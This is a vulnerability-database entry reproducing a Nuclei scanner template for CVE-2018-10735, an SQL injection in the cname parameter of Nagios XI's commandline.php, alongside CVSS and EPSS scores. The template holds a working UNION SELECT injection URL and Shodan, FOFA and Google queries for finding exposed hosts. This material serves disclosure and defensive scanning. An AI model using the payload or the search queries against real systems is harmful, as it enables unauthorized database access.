Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-10735
HistoryApr 02, 2024 - 4:01 a.m.

NagiosXI <= 5.4.12 `commandline.php` SQL injection

2024-04-0204:01:16
ProjectDiscovery
github.com
14
cve
nagios
sqlinjection
commandline
severehigh

CVSS2

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

CVSS3

7.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

AI Score

7.6

Confidence

High

EPSS

0.037

Percentile

91.8%

A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/commandline.php cname parameter.
id: CVE-2018-10735

info:
  name: NagiosXI <= 5.4.12 `commandline.php` SQL injection
  author: DhiyaneshDk
  severity: high
  description: |
    A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/commandline.php cname parameter.
  reference:
    - https://vulners.com/seebug/SSV:97266
    - https://github.com/chaitin/xray/blob/master/pocs/nagio-cve-2018-10735.yml
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2018-10735
    cwe-id: CWE-89
    epss-score: 0.00403
    epss-percentile: 0.7323
    cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: nagios
    product: nagios_xi
    shodan-query: http.title:"nagios xi"
    fofa-query:
      - app="Nagios-XI"
      - title="nagios xi"
      - app="nagios-xi"
    google-query: intitle:"nagios xi"
  tags: cve,cve2018,nagios,sqli
variables:
  num: "{{rand_int(2000000000, 2100000000)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{num}}))%23"

    matchers:
      - type: word
        part: body
        words:
          - "{{md5(num)}}"
# digest: 490a0046304402201c354727727f1f14efb82c00e579f038af14c48aeabf7b91da8eac187c50396402201f20485af6a91b6ee5cd89d0d1eaeb6c4b73c89af6109f6a1ef4900d2408ed03:922c64590222798bb761d5b6d8e72950

CVSS2

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

CVSS3

7.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

AI Score

7.6

Confidence

High

EPSS

0.037

Percentile

91.8%

Related for NUCLEI:CVE-2018-10735